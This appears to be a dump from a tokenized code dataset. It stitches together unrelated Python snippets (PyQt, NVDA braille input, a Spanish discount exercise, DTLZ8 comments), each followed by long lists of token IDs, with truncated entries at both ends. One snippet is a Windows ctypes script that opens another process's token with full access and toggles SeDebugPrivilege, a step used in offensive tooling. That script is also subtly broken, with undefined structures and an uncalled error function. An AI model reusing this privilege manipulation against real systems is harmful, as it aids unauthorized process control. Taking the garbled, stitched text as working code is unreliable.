220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
834,
18453,
13414,
2649,
30642,
10354,
19637,
30642,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
32092,
628,
220,
4321,
62,
744,
82,
7,
29891,
11,
26498,
13,
13317,
62,
312,
11,
26498,
13,
28446,
8,
198
] | 2.735426 | 446 |
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
| [
6738,
9485,
48,
83,
19,
1330,
33734,
14055,
11,
33734,
8205,
72,
201,
198,
201,
198,
28311,
25,
201,
198,
220,
220,
220,
4808,
6738,
18274,
69,
23,
796,
33734,
14055,
13,
48,
10100,
13,
6738,
18274,
69,
23,
201,
198,
16341,
3460,
4163,
12331,
25,
201,
198,
220,
220,
220,
4808,
6738,
18274,
69,
23,
796,
37456,
264,
25,
264,
201,
198
] | 2.142857 | 63 |
## Modify Process Token
# Global Imports
import ctypes
from ctypes.wintypes import DWORD
# Grab a handle on Advapi.dll, User32.dll and Kernel32.dll
a_handle = ctypes.WinDLL("Advapi32.dll")
u_handle = ctypes.WinDLL("User32.dll")
k_handle = ctypes.WinDLL("Kernel32.dll")
# Shortcut to give "All Access" rights to the current process.
# The |'s are being used as "or" statements, as a shortcut instead of typing out every variable needed, and their values.
PROCESS_ALL_ACCESS = ( 0x000f0000 | 0x00100000 | 0xFFF)
# Also used in C# Libraries
# 2 is enabled, 0 is disabled
SE_PRIVILEGE_ENABLED = 0x00000002
SE_PRIVILEGE_DISABLED = 0x00000000
# Token Access Rights
STANDARD_RIGHTS_REQUIRED = 0x000F0000 #
STANDARD_RIGHTS_READ = 0x00020000 #
TOKEN_ASSIGN_PRIMARY = 0x0001 #
TOKEN_DUPLICATE = 0x0002 #
TOKEN_IMPERSONATION = 0x0004 #
TOKEN_QUERY = 0x0008 #
TOKEN_QUERY_SOURCE = 0x0010 #
TOKEN_ADJUST_PRIVILEGES = 0x0020 #
TOKEN_ADJUST_GROUPS = 0x0040 #
TOKEN_ADJUST_DEFAULT = 0x0080 #
TOKEN_ADJUST_SESSIONID = 0x0100 #
TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY) #
TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED |
TOKEN_ASSIGN_PRIMARY |
TOKEN_DUPLICATE |
TOKEN_IMPERSONATION |
TOKEN_QUERY |
TOKEN_QUERY_SOURCE |
TOKEN_ADJUST_PRIVILEGES |
TOKEN_ADJUST_GROUPS |
TOKEN_ADJUST_DEFAULT |
TOKEN_ADJUST_SESSIONID)
# Grab the Window Name from User32.dll
lpWindowName = ctypes.c_char_p(input("Enter Window name to hook into: ").encode('utf-8'))
hWnd = u_handle.FindWindowA(None, lpWindowName)
if hWnd == 0:
print("Error Code: {0} - Could not grab Process Handle! Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
else:
print("Successfuly got Handle.")
lpdwProcessId = ctypes.c_ulong()
response = u_handle.GetWindowThreadProcessId(hWnd, ctypes.byref(lpdwProcessId))
if response == 0:
print("Error Code: {0} - Could not grab PID from Handle! Error Code: {0}".format(k_handle.GetlastError))
exit(1)
else:
print("Successfuly got PID!")
dwDesiredAccess = PROCESS_ALL_ACCESS
bInheritHandle = False
dwProcessId = lpdwProcessId
hProcess = k_handle.OpenProcess(dwDesiredAccess, bInheritHandle, dwProcessId)
if hProcess <= 0:
print("Error Code {0} - Could not grab Priv Handle".format(k_handle.GetLastError()))
else:
print("Successfully grabbed higher privileges!")
# Open a Handle to the Process's Token Directly
ProcessHandle = hProcess
DesiredAccess = TOKEN_ALL_ACCESS
TokenHandle = ctypes.c_void_p()
response = k_handle.OpenProcessToken(ProcessHandle, DesiredAccess, ctypes.byref(TokenHandle))
if response > 0:
print("Handle to Process Token created! Token: {0}".format(TokenHandle))
else:
print("Error: could not grab priviledged Token Handle! Error Code: {0}".format(k_handle.GetLastError()))
lpSystemName = None
lpName = "SEDebugPrivilege"
lpLuid = LUID()
response = a_handle.LookupPrivilegeValueW(lpSystemName, lpName, ctypes.byref(lpLuid))
if response > 0:
print("Successfully found the LUID!")
else:
print("Error: could not grab LUID! Error Code: {0}".format(k_handle.GetLastError()))
print("LUID VALUE HIGH: {0} \nLUID VALUE LOW: {1}".format(lpLuid.HighPart, lpLuid.LowPart))
requiredPrivileges = PRIVILEGE_SET()
requiredPrivileges.PrivilegeCount = 1
requiredPrivileges.Privileges = LUID_AND_ATTRIBUTES()
requiredPrivileges.Privileges.Luid = lpLuid
requiredPrivileges.Privileges.Attributes = SE_PRIVILEGE_ENABLED
pfResult = ctypes.c_long()
response = a_handle.PrivilegeCheck(TokenHandle, ctypes.byref(requiredPrivileges), ctypes.byref(pfResult))
if response > 0:
print("Successfully ran Privilege check!")
else:
print("Error: Was unable to check Privileges! Error Code: {0}".format(k_handle.GetLastError()))
if pfResult:
print("Privilege Enabled: {0}".format(lpName))
requiredPrivileges.Privileges.Attributes = SE_PRIVILEGE_DISABLED
else:
print("Privileges Disabled: {0}".format(lpName))
requiredPrivileges.Privileges.Attributes = SE_PRIVILEGE_ENABLED
DisableAllPrivileges = False
NewState = TOKEN_PRIVILEGES()
BufferLength = ctypes.sizeof(NewState)
PreviousState = ctypes.c_void_p()
ReturnLength =ctypes.c_void_p()
NewState.PrivilegeCount = 1
NewState.Privileges = requiredPrivileges.Privileges
response = a_handle.AdjustTokenPrivileges(
TokenHandle,
DisableAllPrivileges,
ctypes.byref(NewState),
BufferLength,
ctypes.byref(PreviousState),
ctypes.byref(ReturnLength))
if response > 0:
print("Token was successfully modified!")
else:
print("Error: Was unable to check Privileges! Error Code: {0}".format(k_handle.GetLastError()))
| [
2235,
3401,
1958,
10854,
29130,
201,
198,
201,
198,
2,
8060,
1846,
3742,
201,
198,
11748,
269,
19199,
201,
198,
6738,
269,
19199,
13,
86,
600,
9497,
1330,
29652,
12532,
201,
198,
201,
198,
2,
25339,
257,
5412,
319,
8007,
15042,
13,
12736,
11,
11787,
2624,
13,
12736,
290,
32169,
2624,
13,
12736,
201,
198,
64,
62,
28144,
796,
269,
19199,
13,
16643,
35,
3069,
7203,
22856,
15042,
2624,
13,
12736,
4943,
201,
198,
84,
62,
28144,
796,
269,
19199,
13,
16643,
35,
3069,
7203,
12982,
2624,
13,
12736,
4943,
201,
198,
74,
62,
28144,
796,
269,
19199,
13,
16643,
35,
3069,
7203,
42,
7948,
2624,
13,
12736,
4943,
201,
198,
201,
198,
2,
10073,
8968,
284,
1577,
366,
3237,
8798,
1,
2489,
284,
262,
1459,
1429,
13,
220,
201,
198,
2,
383,
930,
6,
82,
389,
852,
973,
355,
366,
273,
1,
6299,
11,
355,
257,
29401,
2427,
286,
19720,
503,
790,
7885,
2622,
11,
290,
511,
3815,
13,
201,
198,
4805,
4503,
7597,
62,
7036,
62,
26861,
7597,
796,
357,
657,
87,
830,
69,
2388,
930,
657,
87,
405,
3064,
830,
930,
657,
87,
5777,
37,
8,
201,
198,
201,
198,
2,
4418,
973,
287,
327,
2,
46267,
201,
198,
2,
362,
318,
9343,
11,
657,
318,
10058,
201,
198,
5188,
62,
4805,
3824,
41119,
8264,
62,
1677,
6242,
30465,
796,
657,
87,
24598,
17,
201,
198,
5188,
62,
4805,
3824,
41119,
8264,
62,
26288,
6242,
30465,
796,
657,
87,
8269,
201,
198,
201,
198,
2,
29130,
8798,
6923,
201,
198,
2257,
6981,
9795,
62,
49,
34874,
62,
2200,
10917,
37819,
796,
657,
87,
830,
37,
2388,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
201,
198,
2257,
6981,
9795,
62,
49,
34874,
62,
15675,
796,
657,
87,
830,
2167,
405,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
201,
198,
10468,
43959,
62,
10705,
16284,
62,
4805,
3955,
13153,
796,
657,
87,
18005,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
201,
198,
10468,
43959,
62,
35,
52,
31484,
6158,
796,
657,
87,
34215,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
201,
198,
10468,
43959,
62,
3955,
47,
29086,
6234,
796,
657,
87,
830,
19,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
201,
198,
10468,
43959,
62,
10917,
19664,
796,
657,
87,
830,
23,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
201,
198,
10468,
43959,
62,
10917,
19664,
62,
47690,
796,
657,
87,
37187,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
201,
198,
10468,
43959,
62,
2885,
25008,
62,
4805,
3824,
41119,
48075,
796,
657,
87,
405,
1238,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
201,
198,
10468,
43959,
62,
2885,
25008,
62,
10761,
2606,
3705,
796,
657,
87,
405,
1821,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
201,
198,
10468,
43959,
62,
2885,
25008,
62,
7206,
38865,
796,
657,
87,
405,
1795,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
201,
198,
10468,
43959,
62,
2885,
25008,
62,
50,
47621,
2389,
796,
657,
87,
39103,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
201,
198,
10468,
43959,
62,
15675,
796,
357,
2257,
6981,
9795,
62,
49,
34874,
62,
15675,
930,
5390,
43959,
62,
10917,
19664,
8,
220,
220,
1303,
201,
198,
10468,
43959,
62,
7036,
62,
26861,
7597,
796,
357,
2257,
6981,
9795,
62,
49,
34874,
62,
2200,
10917,
37819,
930,
220,
201,
198,
197,
197,
197,
197,
197,
10468,
43959,
62,
10705,
16284,
62,
4805,
3955,
13153,
220,
220,
220,
220,
930,
201,
198,
197,
197,
197,
197,
197,
10468,
43959,
62,
35,
52,
31484,
6158,
220,
220,
220,
220,
220,
220,
220,
220,
220,
930,
201,
198,
197,
197,
197,
197,
197,
10468,
43959,
62,
3955,
47,
29086,
6234,
220,
220,
220,
220,
220,
930,
201,
198,
197,
197,
197,
197,
197,
10468,
43959,
62,
10917,
19664,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
930,
201,
198,
197,
197,
197,
197,
197,
10468,
43959,
62,
10917,
19664,
62,
47690,
220,
220,
220,
220,
220,
220,
930,
201,
198,
197,
197,
197,
197,
197,
10468,
43959,
62,
2885,
25008,
62,
4805,
3824,
41119,
48075,
220,
930,
201,
198,
197,
197,
197,
197,
197,
10468,
43959,
62,
2885,
25008,
62,
10761,
2606,
3705,
220,
220,
220,
220,
220,
930,
201,
198,
197,
197,
197,
197,
197,
10468,
43959,
62,
2885,
25008,
62,
7206,
38865,
220,
220,
220,
220,
930,
201,
198,
197,
197,
197,
197,
197,
10468,
43959,
62,
2885,
25008,
62,
50,
47621,
2389,
8,
201,
198,
201,
198,
2,
25339,
262,
26580,
6530,
422,
11787,
2624,
13,
12736,
201,
198,
34431,
27703,
5376,
796,
269,
19199,
13,
66,
62,
10641,
62,
79,
7,
15414,
7203,
17469,
26580,
1438,
284,
8011,
656,
25,
366,
737,
268,
8189,
10786,
40477,
12,
23,
6,
4008,
201,
198,
71,
54,
358,
796,
334,
62,
28144,
13,
16742,
27703,
32,
7,
14202,
11,
300,
79,
27703,
5376,
8,
201,
198,
201,
198,
361,
289,
54,
358,
6624,
657,
25,
201,
198,
220,
220,
220,
3601,
7203,
12331,
6127,
25,
1391,
15,
92,
532,
10347,
407,
5552,
10854,
33141,
0,
13047,
6127,
25,
1391,
15,
92,
1911,
18982,
7,
74,
62,
28144,
13,
3855,
5956,
12331,
3419,
4008,
201,
198,
220,
220,
220,
8420,
7,
16,
8,
201,
198,
17772,
25,
201,
198,
220,
220,
220,
3601,
7203,
33244,
69,
2062,
1392,
33141,
19570,
201,
198,
201,
198,
75,
30094,
86,
18709,
7390,
796,
269,
19199,
13,
66,
62,
377,
506,
3419,
201,
198,
201,
198,
26209,
796,
334,
62,
28144,
13,
3855,
27703,
16818,
18709,
7390,
7,
71,
54,
358,
11,
269,
19199,
13,
1525,
5420,
7,
75,
30094,
86,
18709,
7390,
4008,
201,
198,
201,
198,
361,
2882,
6624,
657,
25,
201,
198,
220,
220,
220,
3601,
7203,
12331,
6127,
25,
1391,
15,
92,
532,
10347,
407,
5552,
37022,
422,
33141,
0,
13047,
6127,
25,
1391,
15,
92,
1911,
18982,
7,
74,
62,
28144,
13,
3855,
12957,
12331,
4008,
201,
198,
220,
220,
220,
8420,
7,
16,
8,
201,
198,
17772,
25,
201,
198,
220,
220,
220,
3601,
7203,
33244,
69,
2062,
1392,
37022,
2474,
8,
201,
198,
201,
198,
67,
86,
5960,
1202,
15457,
796,
41755,
7597,
62,
7036,
62,
26861,
7597,
201,
198,
65,
818,
372,
270,
37508,
796,
10352,
201,
198,
67,
86,
18709,
7390,
796,
300,
30094,
86,
18709,
7390,
201,
198,
201,
198,
71,
18709,
796,
479,
62,
28144,
13,
11505,
18709,
7,
67,
86,
5960,
1202,
15457,
11,
275,
818,
372,
270,
37508,
11,
43756,
18709,
7390,
8,
201,
198,
201,
198,
361,
289,
18709,
19841,
657,
25,
201,
198,
220,
220,
220,
3601,
7203,
12331,
6127,
1391,
15,
92,
532,
10347,
407,
5552,
9243,
33141,
1911,
18982,
7,
74,
62,
28144,
13,
3855,
5956,
12331,
3419,
4008,
201,
198,
17772,
25,
201,
198,
220,
220,
220,
3601,
7203,
33244,
2759,
13176,
2440,
18850,
2474,
8,
201,
198,
201,
198,
2,
4946,
257,
33141,
284,
262,
10854,
338,
29130,
4128,
306,
201,
198,
18709,
37508,
796,
289,
18709,
201,
198,
5960,
1202,
15457,
796,
5390,
43959,
62,
7036,
62,
26861,
7597,
201,
198,
30642,
37508,
796,
269,
19199,
13,
66,
62,
19382,
62,
79,
3419,
201,
198,
201,
198,
26209,
796,
479,
62,
28144,
13,
11505,
18709,
30642,
7,
18709,
37508,
11,
2935,
1202,
15457,
11,
269,
19199,
13,
1525,
5420,
7,
30642,
37508,
4008,
201,
198,
201,
198,
361,
2882,
1875,
657,
25,
201,
198,
220,
220,
220,
3601,
7203,
37508,
284,
10854,
29130,
2727,
0,
29130,
25,
1391,
15,
92,
1911,
18982,
7,
30642,
37508,
4008,
201,
198,
17772,
25,
201,
198,
220,
220,
220,
3601,
7203,
12331,
25,
714,
407,
5552,
1953,
3902,
2004,
29130,
33141,
0,
13047,
6127,
25,
1391,
15,
92,
1911,
18982,
7,
74,
62,
28144,
13,
3855,
5956,
12331,
3419,
4008,
201,
198,
201,
198,
34431,
11964,
5376,
796,
6045,
201,
198,
34431,
5376,
796,
366,
50,
1961,
1765,
1018,
20184,
41866,
1,
201,
198,
34431,
25596,
312,
796,
406,
27586,
3419,
201,
198,
201,
198,
26209,
796,
257,
62,
28144,
13,
8567,
929,
20184,
41866,
11395,
54,
7,
34431,
11964,
5376,
11,
300,
79,
5376,
11,
269,
19199,
13,
1525,
5420,
7,
34431,
25596,
312,
4008,
201,
198,
201,
198,
361,
2882,
1875,
657,
25,
201,
198,
220,
220,
220,
3601,
7203,
33244,
2759,
1043,
262,
406,
27586,
2474,
8,
201,
198,
17772,
25,
201,
198,
220,
220,
220,
3601,
7203,
12331,
25,
714,
407,
5552,
406,
27586,
0,
13047,
6127,
25,
1391,
15,
92,
1911,
18982,
7,
74,
62,
28144,
13,
3855,
5956,
12331,
3419,
4008,
201,
198,
201,
198,
4798,
7203,
43,
27586,
26173,
8924,
34677,
25,
1391,
15,
92,
3467,
77,
43,
27586,
26173,
8924,
46663,
25,
1391,
16,
92,
1911,
18982,
7,
34431,
25596,
312,
13,
11922,
7841,
11,
300,
79,
25596,
312,
13,
20535,
7841,
4008,
201,
198,
201,
198,
35827,
20184,
576,
3212,
796,
4810,
3824,
41119,
8264,
62,
28480,
3419,
201,
198,
35827,
20184,
576,
3212,
13,
20184,
41866,
12332,
796,
352,
201,
198,
35827,
20184,
576,
3212,
13,
20184,
576,
3212,
796,
406,
27586,
62,
6981,
62,
1404,
5446,
9865,
3843,
1546,
3419,
201,
198,
35827,
20184,
576,
3212,
13,
20184,
576,
3212,
13,
25596,
312,
796,
300,
79,
25596,
312,
201,
198,
35827,
20184,
576,
3212,
13,
20184,
576,
3212,
13,
29021,
796,
7946,
62,
4805,
3824,
41119,
8264,
62,
1677,
6242,
30465,
201,
198,
201,
198,
79,
69,
23004,
796,
269,
19199,
13,
66,
62,
6511,
3419,
201,
198,
201,
198,
26209,
796,
257,
62,
28144,
13,
20184,
41866,
9787,
7,
30642,
37508,
11,
269,
19199,
13,
1525,
5420,
7,
35827,
20184,
576,
3212,
828,
269,
19199,
13,
1525,
5420,
7,
79,
69,
23004,
4008,
201,
198,
201,
198,
361,
2882,
1875,
657,
25,
201,
198,
220,
220,
220,
3601,
7203,
33244,
2759,
4966,
9243,
41866,
2198,
2474,
8,
201,
198,
17772,
25,
201,
198,
220,
220,
220,
3601,
7203,
12331,
25,
8920,
5906,
284,
2198,
9243,
576,
3212,
0,
13047,
6127,
25,
1391,
15,
92,
1911,
18982,
7,
74,
62,
28144,
13,
3855,
5956,
12331,
3419,
4008,
201,
198,
201,
198,
361,
279,
69,
23004,
25,
201,
198,
220,
220,
220,
3601,
7203,
20184,
41866,
37344,
25,
1391,
15,
92,
1911,
18982,
7,
34431,
5376,
4008,
201,
198,
220,
220,
220,
2672,
20184,
576,
3212,
13,
20184,
576,
3212,
13,
29021,
796,
7946,
62,
4805,
3824,
41119,
8264,
62,
26288,
6242,
30465,
201,
198,
17772,
25,
201,
198,
220,
220,
220,
3601,
7203,
20184,
576,
3212,
43201,
25,
1391,
15,
92,
1911,
18982,
7,
34431,
5376,
4008,
201,
198,
220,
220,
220,
2672,
20184,
576,
3212,
13,
20184,
576,
3212,
13,
29021,
796,
7946,
62,
4805,
3824,
41119,
8264,
62,
1677,
6242,
30465,
201,
198,
201,
198,
48893,
3237,
20184,
576,
3212,
796,
10352,
201,
198,
3791,
9012,
796,
5390,
43959,
62,
4805,
3824,
41119,
48075,
3419,
201,
198,
28632,
24539,
796,
269,
19199,
13,
7857,
1659,
7,
3791,
9012,
8,
201,
198,
21448,
9012,
796,
269,
19199,
13,
66,
62,
19382,
62,
79,
3419,
201,
198,
13615,
24539,
796,
310,
9497,
13,
66,
62,
19382,
62,
79,
3419,
201,
198,
201,
198,
3791,
9012,
13,
20184,
41866,
12332,
796,
352,
201,
198,
3791,
9012,
13,
20184,
576,
3212,
796,
2672,
20184,
576,
3212,
13,
20184,
576,
3212,
201,
198,
201,
198,
26209,
796,
257,
62,
28144,
13,
39668,
30642,
20184,
576,
3212,
7,
201,
198,
220,
220,
220,
29130,
37508,
11,
201,
198,
220,
220,
220,
31529,
3237,
20184,
576,
3212,
11,
201,
198,
220,
220,
220,
269,
19199,
13,
1525,
5420,
7,
3791,
9012,
828,
201,
198,
220,
220,
220,
47017,
24539,
11,
201,
198,
220,
220,
220,
269,
19199,
13,
1525,
5420,
7,
21448,
9012,
828,
201,
198,
220,
220,
220,
269,
19199,
13,
1525,
5420,
7,
13615,
24539,
4008,
201,
198,
201,
198,
361,
2882,
1875,
657,
25,
201,
198,
220,
220,
220,
3601,
7203,
30642,
373,
7675,
9518,
2474,
8,
201,
198,
17772,
25,
201,
198,
220,
220,
220,
3601,
7203,
12331,
25,
8920,
5906,
284,
2198,
9243,
576,
3212,
0,
13047,
6127,
25,
1391,
15,
92,
1911,
18982,
7,
74,
62,
28144,
13,
3855,
5956,
12331,
3419,
4008,
201,
198
] | 2.310867 | 2,181 |
from abc import ABC, abstractmethod
| [
6738,
450,
66,
1330,
9738,
11,
12531,
24396,
628
] | 4.111111 | 9 |
"""
Ejercicio 15
Dados como datos el precio final pagado por un producto y su precio de venta al pรบblico (PVP), se requiere
que calcule y muestre el porcentaje de descuento que le ha sido aplicado.
Entradas
Precio_Final_Pagado --> Float --> P_F
Precio_Venta_Publico --> Float --> P_V_P
Salidas
Porcentaje_Descuento --> Float --> P_D
"""
# Instrucciones al usuario
print("Para conocer el porcentaje de descuento, escriba lo siguiente: ")
# Entradas
P_F = float(input("Digite el precio final pagado por el producto: "))
P_V_P = float(input("Digite el precio de venta al pรบblico del producto: "))
# Caja negra
P_D = ((P_V_P-P_F)/P_V_P)*100
# Salidas
print(f"El porcentaje de descuento aplicado es de: {P_D}%")
| [
37811,
198,
36,
73,
2798,
46441,
1315,
198,
35,
22484,
401,
78,
4818,
418,
1288,
3718,
952,
2457,
42208,
4533,
16964,
555,
1720,
78,
331,
424,
3718,
952,
390,
7435,
64,
435,
279,
21356,
65,
677,
78,
357,
47,
8859,
828,
384,
1038,
13235,
198,
4188,
2386,
23172,
331,
38779,
395,
260,
1288,
16964,
1087,
1228,
68,
390,
1715,
84,
50217,
8358,
443,
387,
9785,
78,
257,
489,
291,
4533,
13,
198,
198,
14539,
6335,
292,
198,
6719,
66,
952,
62,
19006,
62,
47,
363,
4533,
14610,
48436,
14610,
350,
62,
37,
198,
6719,
66,
952,
62,
53,
29188,
62,
15202,
78,
14610,
48436,
14610,
350,
62,
53,
62,
47,
198,
198,
50,
10751,
292,
198,
47,
273,
1087,
1228,
68,
62,
24564,
84,
50217,
14610,
48436,
14610,
350,
62,
35,
198,
37811,
198,
2,
2262,
622,
535,
295,
274,
435,
514,
84,
4982,
198,
4798,
7203,
47,
3301,
369,
420,
263,
1288,
16964,
1087,
1228,
68,
390,
1715,
84,
50217,
11,
3671,
822,
64,
2376,
43237,
84,
1153,
68,
25,
366,
8,
198,
2,
7232,
6335,
292,
198,
47,
62,
37,
796,
12178,
7,
15414,
7203,
19511,
578,
1288,
3718,
952,
2457,
42208,
4533,
16964,
1288,
1720,
78,
25,
366,
4008,
198,
47,
62,
53,
62,
47,
796,
12178,
7,
15414,
7203,
19511,
578,
1288,
3718,
952,
390,
7435,
64,
435,
279,
21356,
65,
677,
78,
1619,
1720,
78,
25,
366,
4008,
198,
2,
327,
27792,
2469,
430,
198,
47,
62,
35,
796,
14808,
47,
62,
53,
62,
47,
12,
47,
62,
37,
20679,
47,
62,
53,
62,
47,
27493,
3064,
198,
2,
4849,
24496,
198,
4798,
7,
69,
1,
9527,
16964,
1087,
1228,
68,
390,
1715,
84,
50217,
257,
489,
291,
4533,
1658,
390,
25,
1391,
47,
62,
35,
92,
4,
4943,
198
] | 2.40339 | 295 |
#brailleInput.py
#A part of NonVisual Desktop Access (NVDA)
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
#Copyright (C) 2012-2013 NV Access Limited, Rui Batista
import os.path
import louis
import braille
import config
from logHandler import log
import winUser
import inputCore
"""Framework for handling braille input from the user.
All braille input is represented by a {BrailleInputGesture}.
Normally, all that is required is to create and execute a L{BrailleInputGesture},
as there are built-in gesture bindings for braille input.
"""
#: The singleton BrailleInputHandler instance.
#: @type: L{BrailleInputHandler}
handler = None
class BrailleInputHandler(object):
"""Handles braille input.
"""
def input(self, dots):
"""Handle one cell of braille input.
"""
# liblouis requires us to set the highest bit for proper use of dotsIO.
char = unichr(dots | 0x8000)
text = louis.backTranslate(
[os.path.join(braille.TABLES_DIR, config.conf["braille"]["inputTable"]),
"braille-patterns.cti"],
char, mode=louis.dotsIO)
chars = text[0]
if len(chars) > 0:
self.sendChars(chars)
class BrailleInputGesture(inputCore.InputGesture):
"""Input (dots and/or space bar) from a braille keyboard.
This could either be as part of a braille display or a stand-alone unit.
L{dots} and L{space} should be set appropriately.
"""
#: Bitmask of pressed dots.
#: @type: int
dots = 0
#: Whether the space bar is pressed.
#: @type: bool
space = False
| [
2,
16057,
8270,
20560,
13,
9078,
198,
2,
32,
636,
286,
8504,
36259,
27850,
8798,
357,
27159,
5631,
8,
198,
2,
1212,
2393,
318,
5017,
416,
262,
22961,
3611,
5094,
13789,
13,
198,
2,
6214,
262,
2393,
27975,
45761,
329,
517,
3307,
13,
198,
2,
15269,
357,
34,
8,
2321,
12,
6390,
23973,
8798,
15302,
11,
371,
9019,
6577,
12523,
198,
198,
11748,
28686,
13,
6978,
198,
11748,
21081,
271,
198,
11748,
8290,
8270,
198,
11748,
4566,
198,
6738,
2604,
25060,
1330,
2604,
198,
11748,
1592,
12982,
198,
11748,
5128,
14055,
198,
198,
37811,
21055,
6433,
329,
9041,
8290,
8270,
5128,
422,
262,
2836,
13,
198,
3237,
8290,
8270,
5128,
318,
7997,
416,
257,
1391,
42333,
8270,
20560,
38,
395,
495,
27422,
198,
43625,
11,
477,
326,
318,
2672,
318,
284,
2251,
290,
12260,
257,
406,
90,
42333,
8270,
20560,
38,
395,
495,
5512,
198,
292,
612,
389,
3170,
12,
259,
18342,
34111,
329,
8290,
8270,
5128,
13,
198,
37811,
198,
198,
2,
25,
383,
2060,
1122,
9718,
8270,
20560,
25060,
4554,
13,
198,
2,
25,
2488,
4906,
25,
406,
90,
42333,
8270,
20560,
25060,
92,
198,
30281,
796,
6045,
198,
198,
4871,
9718,
8270,
20560,
25060,
7,
15252,
2599,
198,
197,
37811,
12885,
829,
8290,
8270,
5128,
13,
198,
197,
37811,
628,
197,
4299,
5128,
7,
944,
11,
22969,
2599,
198,
197,
197,
37811,
37508,
530,
2685,
286,
8290,
8270,
5128,
13,
198,
197,
197,
37811,
198,
197,
197,
2,
9195,
75,
280,
271,
4433,
514,
284,
900,
262,
4511,
1643,
329,
1774,
779,
286,
22969,
9399,
13,
198,
197,
197,
10641,
796,
555,
488,
81,
7,
67,
1747,
930,
657,
87,
33942,
8,
198,
197,
197,
5239,
796,
21081,
271,
13,
1891,
8291,
17660,
7,
198,
197,
197,
197,
58,
418,
13,
6978,
13,
22179,
7,
16057,
8270,
13,
5603,
9148,
1546,
62,
34720,
11,
4566,
13,
10414,
14692,
16057,
8270,
1,
7131,
1,
15414,
10962,
8973,
828,
198,
197,
197,
197,
1,
16057,
8270,
12,
33279,
82,
13,
310,
72,
33116,
198,
197,
197,
197,
10641,
11,
4235,
28,
75,
280,
271,
13,
67,
1747,
9399,
8,
198,
197,
197,
354,
945,
796,
2420,
58,
15,
60,
198,
197,
197,
361,
18896,
7,
354,
945,
8,
1875,
657,
25,
198,
197,
197,
197,
944,
13,
21280,
1925,
945,
7,
354,
945,
8,
198,
198,
4871,
9718,
8270,
20560,
38,
395,
495,
7,
15414,
14055,
13,
20560,
38,
395,
495,
2599,
198,
197,
37811,
20560,
357,
67,
1747,
290,
14,
273,
2272,
2318,
8,
422,
257,
8290,
8270,
10586,
13,
198,
197,
1212,
714,
2035,
307,
355,
636,
286,
257,
8290,
8270,
3359,
393,
257,
1302,
12,
17749,
4326,
13,
198,
197,
43,
90,
67,
1747,
92,
290,
406,
90,
13200,
92,
815,
307,
900,
20431,
13,
198,
197,
37811,
628,
197,
2,
25,
4722,
27932,
286,
12070,
22969,
13,
198,
197,
2,
25,
2488,
4906,
25,
493,
198,
197,
67,
1747,
796,
657,
628,
197,
2,
25,
10127,
262,
2272,
2318,
318,
12070,
13,
198,
197,
2,
25,
2488,
4906,
25,
20512,
198,
197,
13200,
796,
10352,
198
] | 2.978474 | 511 |
from typing import List, Optional, Tuple
import numpy as np
from gutenTAG.anomalies import AnomalyProtocol, LabelRange, Anomaly
from gutenTAG.base_oscillations.interface import BaseOscillationInterface
| [
6738,
19720,
1330,
7343,
11,
32233,
11,
309,
29291,
198,
198,
11748,
299,
32152,
355,
45941,
198,
198,
6738,
308,
7809,
42197,
13,
272,
18048,
444,
1330,
1052,
24335,
19703,
4668,
11,
36052,
17257,
11,
1052,
24335,
198,
6738,
308,
7809,
42197,
13,
8692,
62,
17500,
359,
602,
13,
39994,
1330,
7308,
46,
22360,
341,
39317,
628,
198
] | 3.551724 | 58 |
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 5 11:06:16 2018
@author: r.dewinter
"""
import numpy as np
#import matplotlib.pyplot as plt
#from mpl_toolkits.mplot3d import Axes3D
#rngMin = np.zeros(9)
#rngMax = np.ones(9)
#nVar = 9
#ref = np.array([1,1,1])
#parameters = np.empty((200,9))
#objectives = np.empty((200,3))
#constraints = np.empty((200,3))
#objectives[:] = 0
#constraints[:] = 0
#parameters[:]= 0
#for i in range(200):
# x = np.random.rand(nVar)*(rngMax-rngMin)+rngMin
# parameters[i] = x
# obj, cons = DTLZ8(x)
# objectives[i] = obj
# constraints[i] = cons
#
#a = np.sum(constraints<0, axis=1)==3
##sum(a)
#fig = plt.figure()
#ax = fig.add_subplot(111,projection='3d')
#ax.scatter(objectives[a][:,0], objectives[a][:,1], objectives[a][:,2])
#fig.show() | [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
201,
198,
37811,
201,
198,
41972,
319,
2892,
1526,
220,
642,
1367,
25,
3312,
25,
1433,
2864,
201,
198,
201,
198,
31,
9800,
25,
